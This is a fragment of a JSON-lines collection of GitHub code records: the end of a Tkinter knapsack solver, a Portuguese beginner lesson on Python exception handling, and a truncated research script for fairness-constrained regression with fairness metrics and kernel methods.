float(self.item[i]),\n                                                 float(self.weight[i])))\n                msg.showinfo(\"SUCCESS\",\n                             \"THE FILE SUCCESSFULLY INSERTED \")\n            except ValueError:\n                msg.showerror(\"ERROR\", \"NO KNAPSACK PROBLEM INSTANCE INSERTED\")\n                self.filed = \"\"\n                self.listofitems = []\n                self.solution = {}\n                self.solvb.forget()\n        else:\n            msg.showerror(\"Error\", \"NO TXT FILE ADDED\")\n\n    def insertfile(self):\n        \"\"\" user inserts a .txt file (problem instance ) \"\"\"\n        if self.filed == \"\":\n            self.filed = filedialog.askopenfilename(initialdir=\"/\", title=\"Select txt file\",\n                                                    filetypes=((\"txt files\", \"*.txt\"),\n                                                               (\"all files\", \"*.*\")))\n            self.file_verification()\n        else:\n            msg.showerror(\"ERROR\", \"YOU NEED TO CLOSE THE FILE\")\n    \n    def show_solution(self):\n        \"\"\" Shows info about the solution\"\"\"\n        if self.solution == {}:\n            msg.showerror(\"Error\", \"THERE IS NO AVAILABLE SOLUTION.\\n USE THE SOLVE BUTTON\")\n        else:\n            msg.showinfo(\"Solution\",\n                         \"Value:\"+ str(self.solution.get(\"Value\")) +\n                         \"Items\"+ str(self.solution.get(\"Items\")))\n    \n    def save_solution(self):\n        if self.solution == {}:\n            msg.showerror(\"Error\", \"THERE IS NO AVAILABLE SOLUTION.\\n USE THE SOLVE BUTTON\")\n        else:\n            with open(\"sol\"+str(self.filed.split(\"/\")[-1]), 'w') as f:\n                f.write(str(self.solution))\n\n    def solve(self):\n        \"\"\" solves the problem\"\"\"\n        if self.filed == \"\":\n            msg.showerror(\"ERROR\", \"NO KNAPSACK PROBLEM INSTANCE INSERTED\")\n        else:\n            if self.varnumset.get() == \"Value\":\n                result, totalvalue = greedy(self.listofitems, int(self.maxW), value)\n            elif self.varnumset.get() == \"Density\":\n                result, totalvalue = greedy(self.listofitems, int(self.maxW), density)\n            else:\n                result, totalvalue = greedy(self.listofitems, int(self.maxW), weightInverse)\n            self.solution.update({\"Value\":totalvalue, \"Items\":str([i.getName() for i in result])})\n            
msg.showinfo(\"Solution:\",\n \"Value:\"+str(totalvalue)+\n \"\\n Items:\"+str([i.getName() for i in result]))\n def exitmenu(self):\n \"\"\" exit \"\"\"\n if msg.askokcancel(\"Quit?\", \"Really quit?\"):\n self.master.destroy()\n \n\ndef main():\n \"\"\" main function \"\"\"\n root = Tk()\n KnapsackSolver(root)\n root.mainloop()\nif __name__ == '__main__':\n main()\n","repo_name":"kostaskaragiorgos/Knapsack-Problem","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":6912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22397237808","text":"\"\"\"\nNessa aula, vamos ver como o Python permite tratar erros e criar respostas a essas exceções.\nAprenda como usar a estrutura try except no Python de uma forma simples.\n\"\"\"\n\n\"\"\"\n--> Estrutura padrão:\n\ntry:\n Operação\nexcept:\n Falhou\nelse:\n Deu certo\nfinally:\n Certo/Falha (Vai aparecer de qualquer forma.)\n\n\"\"\"\n# --> Exemplo pratico <--\n\ntry:\n a = int(input('Numero: '))\n b = int(input('Numero: '))\n r = a / b\nexcept Exception as erro:\n print('Ops... Algo deu errado :(')\n print(f'O problema foi: {erro.__class__}')\nexcept (ValueError, TypeError):\n print('Tivemos um problema com o tipo de dado que voce digitou.')\nexcept ZeroDivisionError:\n print('Não e possível dividir um número por ZERO.')\nelse:\n print(f'O resultado e {r:.1f}')\nfinally:\n print('Volte Sempre!')\n","repo_name":"Joao-Vrosa/CursoEmVideo-Python","sub_path":"Modulo-3_CursoEmVideo/Tratamento_de_erros/Tratamento_de_erros.py","file_name":"Tratamento_de_erros.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16270335010","text":"# -*- coding: utf-8 -*-\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.stats\r\nimport time\r\nfrom scipy import sparse\r\nimport datetime\r\nimport sys\r\nimport os\r\nimport copy\r\nimport itertools\r\nfrom sklearn import svm\r\nfrom sklearn import tree\r\nfrom sklearn import ensemble\r\nfrom sklearn import linear_model\r\nfrom sklearn import metrics\r\nfrom sklearn import model_selection\r\nfrom sklearn import preprocessing\r\nfrom sklearn import neural_network\r\nfrom sklearn import gaussian_process\r\nfrom sklearn import kernel_approximation\r\nfrom sklearn import kernel_ridge\r\nfrom scipy import stats\r\n#from fastFM import als, sgd, mcmc\r\nimport pandas as pd\r\n#from statsmodels.discrete import discrete_model\r\nimport math\r\nimport random\r\n\r\n#result class\r\nclass Result:\r\n def __init__(self, Y, Yhat, S, avails):\r\n self.md = self.getMD(Yhat, S, avails)\r\n self.corr = self.getCorr(Yhat, S)\r\n self.auc = self.getAUC(Yhat, S, avails)\r\n self.rmse = self.getRMSE(Y, Yhat)\r\n def elems(self):\r\n return self.md,self.corr,self.auc,self.rmse\r\n def __str__(self):\r\n return \"Result: md=\"+str(self.md)+\" corr=\"+str(self.corr)+\" auc=\"+str(self.auc)+\" rmse=\"+str(self.rmse)\r\n def getMD(self, Yhat, S, avails):\r\n if len(Yhat) != len(S):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n d_s = len(S[0]) #num of sensitive features\r\n l = len(Yhat)\r\n mds = []\r\n for j in range(d_s):\r\n srange = set([S[i,j] for i in range(l)])\r\n if avails[j]:\r\n Y1 = [Yhat[i] for i in range(l) if S[i,j]==1]\r\n Y0 = [Yhat[i] for i in range(l) if S[i,j]==0]\r\n md = abs(np.mean(Y1)-np.mean(Y0))\r\n mds.append(md)\r\n else:\r\n mds.append(False)\r\n return mds\r\n def getCorr(self, Yhat, 
S):\r\n if len(Yhat) != len(S):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n d_s = len(S[0]) #num of sensitive features\r\n l = len(S)\r\n corrs = []\r\n for j in range(d_s):\r\n corr = abs( np.corrcoef(Yhat, S[:,j])[0,1] ) #mdというか相関\r\n corrs.append(corr)\r\n return corrs\r\n def getAUC(self, Yhat, S, avails):\r\n if len(Yhat) != len(S):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n d_s = len(S[0]) #num of sensitive features\r\n l = len(Yhat)\r\n aucs = []\r\n for j in range(d_s):\r\n srange = set([S[i,j] for i in range(l)])\r\n #print \"srange=\",srange\r\n if avails[j]:\r\n Y1 = [Yhat[i] for i in range(l) if S[i,j]==1]\r\n Y0 = [Yhat[i] for i in range(l) if S[i,j]==0]\r\n if len(Y1)*len(Y0)==0:\r\n auc = 0\r\n else:\r\n count = 0\r\n #slow (O(N^2)...)\r\n for y1i in Y1:\r\n for y0j in Y0:\r\n if y1i>y0j:\r\n count+=1\r\n auc = count/float(len(Y1)*len(Y0))\r\n aucs.append(auc)\r\n else:\r\n aucs.append(False)\r\n return aucs\r\n def getRMSE(self, Y, Yhat):\r\n if len(Yhat) != len(Y):\r\n print (\"Error: len(Yhat) != len(S)\");sys.exit()\r\n return np.mean([(Y[i]-Yhat[i])**2 for i in range(len(Y))])**0.5\r\n\r\n#merges several Result classes\r\nclass ResultRep:\r\n def __init__(self):\r\n self.results, self.runnames = [], []\r\n def add_run(self, runname, result):\r\n self.results.append(result)\r\n self.runnames.append(runname)\r\n def merge(self, resultRep):\r\n for i in range(len(resultRep.results)):\r\n result, runname = resultRep.results[i], resultRep.runnames[i]\r\n self.results.append(result)\r\n self.runnames.append(runname)\r\n def __str__(self):\r\n strs = []\r\n for i,_ in enumerate(self.results):\r\n strs.append(\"Title:\"+str(self.runnames[i])+\" \"+str(self.results[i]))\r\n return \"\\n\".join(strs)\r\n def str_pretty(self):\r\n astr = \"\"\r\n md_avgs, corr_avgs, auc_avgs, rmse_avg = {}, {}, {}, {}\r\n for i,_ in enumerate(self.results):\r\n run = self.runnames[i]\r\n conf = copy.deepcopy(self.runnames[i])\r\n conf.pop('run', None)\r\n conf = str(conf) #for using conf as a key \r\n #print (\"conf=\",conf)\r\n if not conf in md_avgs:\r\n md_avgs[conf], corr_avgs[conf], auc_avgs[conf], rmse_avg[conf] = [], [], [], []\r\n result = self.results[i]\r\n md_avgs[conf].append(result.md)\r\n corr_avgs[conf].append(result.corr)\r\n auc_avgs[conf].append(result.auc)\r\n rmse_avg[conf].append(result.rmse)\r\n for conf in md_avgs.keys():\r\n l = len(md_avgs[conf][0])\r\n mds = [np.mean([md_avgs[conf][i][j] for i in range(len(md_avgs[conf]))]) for j in range(l)]\r\n corrs = [np.mean([corr_avgs[conf][i][j] for i in range(len(md_avgs[conf]))]) for j in range(l)]\r\n aucs = [np.mean([auc_avgs[conf][i][j] for i in range(len(md_avgs[conf]))]) for j in range(l)]\r\n rmse = np.mean(rmse_avg[conf])\r\n astr += \"###Result:\"+str(conf) + \" md=\" + str(mds) + \" corr=\" + str(corrs) + \" auc=\" + str(aucs) + \" rmse=\" + str(rmse) + \"\\n\"\r\n #strs.append(\"Title:\"+self.runnames[i]+\" \"+str(self.results[i]))\r\n return astr\r\n\r\nclass Dataset:\r\n def __init__(self, S, X1, X2, y):\r\n self.has_validdata = False\r\n self.has_testdata = False\r\n self.fstStageRegressor = linear_model.Ridge(fit_intercept=True)\r\n self.trainS, self.trainX1, self.trainX2, self.trainY = S, X1, X2, y\r\n def set_traindata(self, S, X1, X2, y):\r\n self.trainS, self.trainX1, self.trainX2, self.trainY = S, X1, X2, y\r\n def add_validdata(self, S, X1, X2, y):\r\n self.validS, self.validX1, self.validX2, self.validY = S, X1, X2, y\r\n self.has_validdata = True\r\n def add_testdata(self, S, X1, 
X2, y):\r\n self.testS, self.testX1, self.testX2, self.testY = S, X1, X2, y\r\n self.has_testdata = True\r\n def getValidationData(self):\r\n if self.has_validdata:\r\n return copy.deepcopy((self.validS, self.validX1, self.validX2, self.validY))\r\n else:\r\n print (\"Error: validation data not found\");sys.exit(0)\r\n def getPredictData(self):\r\n if self.has_testdata:\r\n return copy.deepcopy((self.testS, self.testX1, self.testX2, self.testY))\r\n else:\r\n print (\"Error: test data not found\");sys.exit(0)\r\n return copy.deepcopy((self.trainS, self.trainX1, self.trainX2, self.trainY))\r\n def Unfair_Prediction_Noarg(self, lmd):\r\n X = np.c_[self.trainX1, self.trainX2]\r\n lr = linear_model.Ridge(alpha=lmd, fit_intercept=True)\r\n lr.fit( X, self.trainY )\r\n #validS, validX1, validX2, validY = self.getValidationData()\r\n testS, testX1, testX2, testY = self.getPredictData()\r\n predictX_train = np.c_[self.trainX1, self.trainX2] #use X1, S, and X2\r\n #predictX_valid = np.c_[validX1, validX2] #use X1, S, and X2\r\n predictX_test = np.c_[testX1, testX2] #use X1, S, and X2\r\n yhat_train = lr.predict(predictX_train).flatten()\r\n #yhat_valid = lr.predict(predictX_valid).flatten()\r\n yhat_test = lr.predict(predictX_test).flatten()\r\n y_pred_error_unfair = testY - yhat_test\r\n print (\"genvar=\",np.mean([(testY[i])**2 for i in range(len(testY))])**0.5)\r\n #print \"unfair genavg=\",np.mean([(testY[i]-yhat_test[i])**2 for i in range(len(testY))])**0.5\r\n return yhat_test, np.mean([y_pred_error_unfair**2 for i in range(len(testY))])**0.5\r\n def Unfair_Prediction(self, kernel, lmd, gamma, avails, use_S = False):\r\n if use_S:\r\n X = np.c_[self.trainX1, self.trainS]\r\n else:\r\n X = self.trainX1\r\n if not kernel: #linear\r\n lr = linear_model.Ridge(alpha=lmd, fit_intercept=True)\r\n #lr = linear_model.LinearRegression(fit_intercept=True)\r\n else:\r\n lr = kernel_ridge.KernelRidge(alpha=lmd, kernel=\"rbf\", gamma=gamma)\r\n lr.fit( X, self.trainY )\r\n validS, validX1, validX2, validY = self.getValidationData()\r\n testS, testX1, testX2, testY = self.getPredictData()\r\n if use_S:\r\n predictX_train = np.c_[self.trainX1, self.trainS] \r\n predictX_valid = np.c_[validX1, validS] \r\n predictX_test = np.c_[testX1, testS] \r\n else:\r\n predictX_train = self.trainX1\r\n predictX_valid = validX1 \r\n predictX_test = testX1\r\n yhat_train = lr.predict(predictX_train).flatten()\r\n yhat_valid = lr.predict(predictX_valid).flatten()\r\n yhat_test = lr.predict(predictX_test).flatten()\r\n #print (\"genvar=\",np.mean([(testY[i])**2 for i in range(len(testY))])**0.5)\r\n #print (\"unfair genavg=\",np.mean([(testY[i]-yhat_test[i])**2 for i in range(len(testY))])**0.5)\r\n return Result(self.trainY, yhat_train, self.trainS, avails), Result(validY, yhat_valid, validS, avails), Result(testY, yhat_test, testS, avails)\r\n def train_X1_resid(self, trainX1, trainS_X2, trainS, lr1, use_X2=True):\r\n X1_size = len(trainX1[0])\r\n NumData = len(trainX1)\r\n trainS_X2_resX1 = trainS_X2\r\n #self.stddevs = []\r\n for i in range(X1_size): #train models\r\n #print \"train\",i,trainS_X2_resX1.shape\r\n if use_X2:\r\n X1i = np.array([x[i] for x in trainX1])\r\n lr1[i].fit(trainS_X2_resX1, X1i)\r\n resid = X1i - lr1[i].predict(trainS_X2_resX1)\r\n else:\r\n X1i = np.array([x[i] for x in trainX1])\r\n lr1[i].fit(trainS, X1i)\r\n resid = X1i - lr1[i].predict(trainS)\r\n #stddevS1 = np.std([resid[j] for j in range(NumData) if trainS[j][0]==1])\r\n #stddevS0 = np.std([resid[j] for j in range(NumData) if 
trainS[j][0]==0])\r\n #if stddevS1*stddevS0 <= 0: #cannot correct variance\r\n # print \"error: var0 attr,i\",i;sys.exit(0)\r\n #self.stddevs.append([stddevS1, stddevS0])\r\n def get_X1_resid(self, lrs, X1, S, S_X2, use_X2=True): #note that lrs are classifiers/regressors\r\n X1_size = len(X1[0])\r\n NumData = len(X1)\r\n #print \"X1size,NumData=\",X1_size,NumData,X1.shape\r\n X1_resid_tmp = []\r\n S_X2_resX1 = S_X2\r\n for i in range(X1_size):\r\n if use_X2:\r\n X1_resid_tmp.append( X1[:,i] - lrs[i].predict(S_X2_resX1) )\r\n else:\r\n X1_resid_tmp.append( X1[:,i] - lrs[i].predict(S) )\r\n #print \"correcting variance heteroscadecity\"\r\n #stddevS1, stddevS0 = self.stddevs[i]\r\n #stddev = np.std(X1_resid_tmp[i])\r\n #for j in range(NumData):\r\n # X1_resid_tmp[i][j] /= stddev\r\n #if S[j][0]==1:\r\n # X1_resid_tmp[i][j] /= stddevS1\r\n #else:\r\n # X1_resid_tmp[i][j] /= stddevS0\r\n X1_resid = np.array([[X1_resid_tmp[i][j] for i in range(X1_size)] for j in range(NumData)])\r\n return X1_resid\r\n def save(self, S, X1, X2, Y, filename): #obsolate\r\n fo = file(filename, \"w\")\r\n fo.write(\"#\"+str(S.shape[1])+\",\"+str(X1.shape[1])+\",\"+str(X2.shape[1])+\",\"+str(1)+\"\\n\") #header\r\n for i in xrange(len(Y)): #main\r\n fo.write(\\\r\n \",\".join([str(S[i,j]) for j in range(max(1,S.shape[1]))])+\",\"+\\\r\n \",\".join([str(X1[i,j]) for j in range(X1.shape[1])])+\",\"+\\\r\n \",\".join([str(X2[i,j]) for j in range(max(1,X2.shape[1]))])+\",\"\\\r\n +str(Y[i])+\"\\n\")\r\n fo.close()\r\n def seeResidMean(self, x, S): #see whether E[x|S=1]=E[x|S=0]\r\n print (\"E[x|S=1]=\",np.mean([x[i] for i in range(len(x)) if S[i]==1]),\"E[x|S=0]=\",np.mean([x[i] for i in range(len(x)) if S[i]==0]),\"E[x]=\",np.mean([x[i] for i in range(len(x))]))\r\n print (\"stddev[x|S=1]=\",np.std([x[i] for i in range(len(x)) if S[i]==1]),\"stddev[x|S=0]=\",np.std([x[i] for i in range(len(x)) if S[i]==0]),\"stddev[x]=\",np.std([x[i] for i in range(len(x))]))\r\n def Fair_Prediction_Optimization(self, eps, lmd_n, Vs, Vx, vs, vx):\r\n #calculate alpha, beta as an optimization problem\r\n # min a.T Vx a + b.T Vy b - a.T E[sy] - b.t E[xy]\r\n # s.t. (1-eps)a.T Vs a - eps b.T Vx b\r\n import fairopt\r\n if not (0<=eps<=1):\r\n print (\"Error: eps must be in [0,1]\");sys.exit(0)\r\n #def solveCQP(Q, q, c, epsVal): \r\n # #Solve 1QCQP whose objective function is convex.\r\n # #min x'*setQ{1}*x+2*setq{1}'*x+setc{1}\r\n # #s.t. x'*setQ{2}*x+2*setq{2}'*x+setc{2} <= 0\r\n ds,dx = len(vs),len(vx)\r\n Q = [[],[]]\r\n Q[0] = np.zeros((ds+dx, ds+dx))\r\n Q[0][:ds,:ds] = Vs\r\n Q[0][ds:ds+dx,ds:ds+dx] = Vx[:dx,:dx]\r\n Q[0] += lmd_n * np.identity(ds+dx)\r\n# print \"eps,lmd_n,Q=\",eps,lmd_n,Q\r\n Q[1] = np.zeros((ds+dx, ds+dx))\r\n Q[1][:ds,:ds] = (1-eps)*Vs\r\n Q[1][ds:ds+dx,ds:ds+dx] = -eps*Vx[:dx,:dx]\r\n q = [[], []]\r\n q[0] = np.concatenate((-vs,-vx)).reshape(-1,1)[:ds+dx,:]\r\n q[1] = np.zeros((ds+dx,1))\r\n c = np.array([0,0])\r\n np.set_printoptions(threshold='nan')\r\n sol_cqp, val_cqp = fairopt.solveCQP( Q, q, c, eps, core = 2 )\r\n# print \"sol=\",sol_cqp\r\n return sol_cqp\r\n #sol, val, valfst = fairopt.qcqpSDP_mosek( Q, q, c )\r\n #return sol.flatten()\r\n def Fair_Prediction_Optimization_Correlated(self, eps, S, X, vs, vx):\r\n #calculate alpha, beta as an optimization problem\r\n # min a.T Vx a + b.T Vy b - a.T E[sy] - b.t E[xy]\r\n # s.t. 
(1-eps)a.T Vs a - eps b.T Vx b\r\n import fairopt\r\n if not (0<=eps<=1):\r\n print (\"Error: eps must be in [0,1]\");sys.exit(0)\r\n Vs = np.array(np.cov(S.T)).reshape((1,-1))\r\n Vsx = np.matmul(S.T,X)/len(S)\r\n #xxxxs = np.matmul(X, np.matmul(np.matmul(np.linalg.inv(np.matmul(X.T, X)), X.T),S))\r\n #VsD = np.array(np.cov((S-xxxxs).T)).reshape((1,-1))\r\n Vx = np.cov(X.T)\r\n #print \"Vs,Vx,Vsx norm=\",np.linalg.norm(Vs),np.linalg.norm(Vx),np.linalg.norm(Vsx)\r\n #print vs.shape,vx.shape\r\n ds,dx = len(vs),len(vx)\r\n Q = [[],[]]\r\n Q[0] = np.zeros((ds+dx, ds+dx))\r\n Q[0][:ds,:ds] = Vs\r\n Q[0][ds:ds+dx,ds:ds+dx] = Vx\r\n Q[0][:ds,ds:] = Vsx\r\n Q[0][ds:,:ds] = Vsx.T\r\n #print \"Q[0] svd =\",np.linalg.svd(Q[0])[1]\r\n Q[1] = np.zeros((ds+dx, ds+dx))\r\n Q[1][:ds,:ds] -= eps*Vs\r\n Q[1][:ds,:ds] += Vs\r\n Q[1][:ds,ds:] += (0.5-eps)*Vsx\r\n Q[1][ds:,:ds] += (0.5-eps)*Vsx.T\r\n Q[1][ds:ds+dx,ds:ds+dx] -= eps*Vx[:dx,:dx]\r\n q = [[], []]\r\n q[0] = np.concatenate((-vs,-vx)).reshape(-1,1)[:ds+dx,:]\r\n q[1] = np.zeros((ds+dx,1))\r\n c = np.array([0,0])\r\n np.set_printoptions(threshold='nan')\r\n sol_cqp, val_cqp = fairopt.solveCQP( Q, q, c, eps, core=2 )\r\n return sol_cqp \r\n def Fair_Prediction_Kernel_Optimization(self, eps, lmd, Ks, Kx, S, X, Y):\r\n #kernel version (optimization)\r\n import fairopt\r\n if not (0<=eps<=1):\r\n print (\"Error: eps must be in [0,1]\");sys.exit(0)\r\n Q = [[],[]]\r\n q = [[],[]]\r\n n = len(Y)\r\n Q[0] = np.zeros((2*n, 2*n))\r\n Q[1] = np.zeros((2*n, 2*n))\r\n q[0] = np.zeros((2*n, 1))\r\n q[1] = np.zeros((2*n, 1))\r\n c = np.array([0,0])\r\n #print \"preparing data\";sys.stdout.flush()\r\n Ks2, Kx2 = np.matmul(Ks,Ks), np.matmul(Kx,Kx)\r\n In = np.eye(n, n)\r\n #print \"Ks2,Kx2 norm=\",np.linalg.norm(Ks2),np.linalg.norm(Kx2)\r\n #print \"matrix prepared\";sys.stdout.flush()\r\n for i in range(n):\r\n for j in range(n):\r\n q[0][j] -= Y[i] * Ks[i,j]\r\n q[0][j+n] -= Y[i] * Kx[i,j]\r\n Q[0][i,j] += Ks2[i,j]\r\n Q[0][i+n,j+n] += Kx2[i,j]\r\n Q[0][i,j] += lmd * Ks[i,j] #Ks[i,j]\r\n Q[0][i+n,j+n] += lmd * Kx[i,j]\r\n for i in range(n):\r\n for j in range(n):\r\n Q[1][i,j] += (1.0 - eps) * (Ks2[i,j] + lmd * Ks[i,j]) #note: lambda * In (for making Q PSD)\r\n Q[1][i+n,j+n] += - eps * (Kx2[i,j] + lmd * Kx[i,j])\r\n def mysvd(A): #note: np.svd sometimes fails\r\n try:\r\n X, Y, Z = np.linalg.svd(A)\r\n except:\r\n try:\r\n A2 = np.dot(A.T, A)\r\n X2, Y2, Z = np.linalg.svd(A2)\r\n Y = np.sqrt(Y2)\r\n X = np.dot(A, Z.T); X = np.dot(X, np.linalg.inv(np.diag(Y)))\r\n except:\r\n try:\r\n print (\"svd try2\")\r\n w,v = np.linalg.eigh(np.dot(A.T ,A))\r\n w = w[::-1]; v = v[:,::-1]\r\n Y = np.sqrt(w)\r\n X = np.dot(A,v); X = np.dot(X,np.diag(Y**(-1))); Z = v.T\r\n except:\r\n try:\r\n print (\"svd try3\")\r\n n = A.shape[0]\r\n Ad = A + np.identity(n)*0.01\r\n A2 = np.dot(Ad.T, Ad)\r\n X2, Y2, Z = np.linalg.svd(A2)\r\n Y = np.sqrt(Y2)\r\n X = np.dot(Ad, Z.T); X = np.dot(X, np.linalg.inv(np.diag(Y)))\r\n except:\r\n print (\"svd try4\")\r\n n = A.shape[0]\r\n Ad = A + np.identity(n)*0.1\r\n A2 = np.dot(Ad.T, Ad)\r\n X2, Y2, Z = np.linalg.svd(A2)\r\n Y = np.sqrt(Y2)\r\n X = np.dot(Ad, Z.T); X = np.dot(X, np.linalg.inv(np.diag(Y)))\r\n return X,Y,Z\r\n print (\"calling optimizer\");sys.stdout.flush()\r\n try:\r\n sol, val_cqp = fairopt.solveCQP( Q, q, c, eps )\r\n except:\r\n print (\"Warning: cqp failed. 
trying SDP\")\r\n sol, val_sdp, val_sdp_fst = fairopt.qcqpSDP_mosek( Q, q, c )\r\n sol = sol.flatten()\r\n return sol\r\n def subsample_from_levscore(self, ks, kx, S, X, gamma, p_ratio, ratio):\r\n import leveragescore\r\n n = X.shape[0]\r\n p = int(n*p_ratio)\r\n p_ids = np.random.choice(range(n), p, False)\r\n C = np.zeros((n, p))\r\n W = np.zeros((p, p))\r\n for i in range(n):\r\n for j in range(p):\r\n C[i,j] = kx(X[i], X[p_ids[j]])\r\n for i in range(p):\r\n for j in range(p):\r\n W[i,j] = kx(X[p_ids[i]], X[p_ids[j]])\r\n W = W + 0.01 * np.identity(p) #for numerical stability\r\n B = np.matmul(C, np.linalg.pinv(np.linalg.cholesky(W)))\r\n lmd = gamma/2.0\r\n BtBpNlI_inv = np.linalg.inv(np.matmul(B.T,B)+n*lmd*np.identity(p))\r\n lx = []\r\n for i in range(n):\r\n l = np.matmul(np.matmul(B[i,:].T, BtBpNlI_inv),B[i,:])\r\n lx.append(l)\r\n #ls = leveragescore.leverage_score(Ks, gamma/2.0)\r\n #lx = leveragescore.leverage_score(Kx, gamma/2.0)\r\n dx_eff = sum(lx)\r\n return np.random.choice(range(n), int(n*ratio), False, lx/dx_eff)\r\n def EpsFair_Prediction(self, filename, eps, hparams, avails, p):\r\n is_kernel = p.kernel\r\n rff = p.rff\r\n lmd = hparams[\"lmd\"]\r\n gamma = hparams[\"gamma\"]\r\n if is_kernel and rff:\r\n print (\"Error: either rff or kernel needs to be false\");sys.exit()\r\n\r\n NTrain = len(self.trainX1)\r\n transform_s = p.nonlinears\r\n trainS, trainX1 = copy.deepcopy(self.trainS), copy.deepcopy(self.trainX1)\r\n\r\n if rff:\r\n if not transform_s:\r\n print (\"random fourier feature\")\r\n else:\r\n print (\"random fourier feature (full ns)\")\r\n ds_new = len(self.trainS[0])*10 \r\n dx_new = len(self.trainX1[0])*10 \r\n sys.stdout.flush()\r\n if transform_s:\r\n sampler_s = kernel_approximation.RBFSampler(gamma = hparams[\"gamma\"], n_components = ds_new)\r\n sampler_s.fit(trainS)\r\n trainS = sampler_s.transform(trainS)\r\n sampler_x = kernel_approximation.RBFSampler(gamma = hparams[\"gamma\"], n_components = dx_new)\r\n sampler_x.fit(self.trainX1)\r\n trainX1 = sampler_x.transform(self.trainX1)\r\n else:\r\n trainX1 = self.trainX1\r\n S_std = [np.std(trainS[:,j]) for j in range(len(trainS[0]))]\r\n for j in range(len(trainS[0])):\r\n trainS[:,j] = trainS[:,j] / S_std[j]\r\n X1_size = len(trainX1[0])\r\n lr1 = [] #stage1 regressor/classifiers\r\n for i in range(X1_size):\r\n lr1.append(copy.deepcopy(self.fstStageRegressor))\r\n lr1[-1].set_params(alpha = lmd)\r\n trainS_X2 = np.c_[trainS, self.trainX2] #use S and X2 (not used currently...)\r\n X1_hat_tmp = []\r\n self.train_X1_resid(trainX1, trainS_X2, trainS, lr1, use_X2 = False)\r\n train_X1_resid = self.get_X1_resid(lr1, trainX1, trainS, trainS_X2, use_X2 = False)\r\n X1_std = [np.std(train_X1_resid[:,j]) for j in range(len(self.trainX1[0]))]\r\n for j in range(len(self.trainX1[0])):\r\n train_X1_resid[:,j] = train_X1_resid[:,j] / X1_std[j]\r\n trainX_rn = copy.deepcopy(train_X1_resid) #self.trainX1\r\n\r\n for i in range(trainX_rn.shape[1]):\r\n trainX_rn[:,i] = trainX_rn[:,i] - np.mean(train_X1_resid[:,i])\r\n trainS_n = copy.deepcopy(trainS)\r\n for j in range(len(trainS[0])):\r\n trainS_n[:,j] = trainS[:,j] - np.mean(trainS[:,j])\r\n trainY_n = self.trainY - np.mean(self.trainY)\r\n\r\n validS, validX1, validX2, validY = self.getValidationData()\r\n if rff:\r\n validX1 = sampler_x.transform(validX1)\r\n if transform_s:\r\n validS = sampler_s.transform(validS)\r\n for j in range(len(trainS[0])):\r\n validS[:,j] = validS[:,j] / S_std[j]\r\n validS_X2 = np.c_[validS, validX2] #use S and X2\r\n 
valid_X1_resid = self.get_X1_resid(lr1, validX1, validS, validS_X2, use_X2 = False)\r\n valid_n = len(validS)\r\n for j in range(len(self.trainX1[0])):\r\n valid_X1_resid[:,j] = valid_X1_resid[:,j] / X1_std[j]\r\n validX_rn = valid_X1_resid #self.trainX1\r\n for i in range(train_X1_resid.shape[1]):\r\n validX_rn[:,i] = validX_rn[:,i] - np.mean(train_X1_resid[:,i])\r\n validS_n = copy.deepcopy(validS)\r\n for j in range(len(trainS[0])):\r\n validS_n[:,j] = validS[:,j] - np.mean(trainS[:,j])\r\n validY_n = validY - np.mean(self.trainY)\r\n testS, testX1, testX2, testY = self.getPredictData()\r\n if rff:\r\n testX1 = sampler_x.transform(testX1)\r\n if transform_s:\r\n testS = sampler_s.transform(testS)\r\n for j in range(len(trainS[0])):\r\n testS[:,j] = testS[:,j] / S_std[j]\r\n testS_X2 = np.c_[testS, testX2] #use S and X2\r\n test_X1_resid = self.get_X1_resid(lr1, testX1, testS, testS_X2, use_X2 = False)\r\n for j in range(len(self.trainX1[0])):\r\n test_X1_resid[:,j] = test_X1_resid[:,j] / X1_std[j]\r\n test_n = len(testS)\r\n testX_rn = test_X1_resid #self.trainX1\r\n for i in range(train_X1_resid.shape[1]):\r\n testX_rn[:,i] = testX_rn[:,i] - np.mean(train_X1_resid[:,i])\r\n testS_n = copy.deepcopy(testS)\r\n for j in range(len(trainS[0])):\r\n testS_n[:,j] = testS[:,j] - np.mean(trainS[:,j])\r\n testY_n = testY - np.mean(self.trainY)\r\n\r\n Vs = np.cov(trainS_n.T)\r\n Vx = np.cov(trainX_rn.T)\r\n vs = np.matmul(trainS_n.T, trainY_n)/NTrain\r\n vx = np.matmul(trainX_rn.T, trainY_n)/NTrain\r\n def linearKernel(): return ( lambda x,y:np.dot(x,y) )\r\n def rbfKernel(gamma): return ( lambda x,y:math.exp(-gamma*np.inner(x-y,x-y)) )\r\n def polyKernel(gamma): return ( lambda x,y:(gamma*np.inner(x,y)+1.0)**3 )\r\n if not is_kernel: #Linear\r\n sol = self.Fair_Prediction_Optimization(eps, lmd/NTrain, Vs, Vx, vs, vx) #main optimization\r\n train_S_X1_resid = np.c_[trainS_n, trainX_rn]\r\n trainYhat = [np.dot(sol,train_S_X1_resid[i]) for i in range(NTrain)]\r\n valid_S_X1_resid = np.c_[validS_n, validX_rn]\r\n validYhat = [np.dot(sol,valid_S_X1_resid[i]) for i in range(valid_n)]\r\n test_S_X1_resid = np.c_[testS_n, testX_rn]\r\n testYhat = [np.dot(sol,test_S_X1_resid[i]) for i in range(test_n)]\r\n\r\n result_train = Result(self.trainY, trainYhat + np.mean(self.trainY), self.trainS, avails) \r\n result_valid = Result(validY, validYhat + np.mean(self.trainY), self.validS, avails) \r\n result_test = Result(testY, testYhat + np.mean(self.trainY), self.testS, avails) \r\n else: #Kernel\r\n ks = rbfKernel(gamma)\r\n kx = rbfKernel(gamma)\r\n n = NTrain\r\n subsampling_ratio = 1.0 #0.1\r\n n_sub = int(n*subsampling_ratio)\r\n if subsampling_ratio < 1.0:\r\n sample_ids = self.subsample_from_levscore(ks, kx, trainS_n, trainX_rn, gamma, 0.05, subsampling_ratio)\r\n else:\r\n sample_ids = [i for i in range(n)]\r\n\r\n Ks, Kx = np.zeros((n_sub, n_sub)), np.zeros((n_sub, n_sub))\r\n trainS_n_sub = trainS_n[sample_ids]\r\n trainX_rn_sub = trainX_rn[sample_ids]\r\n 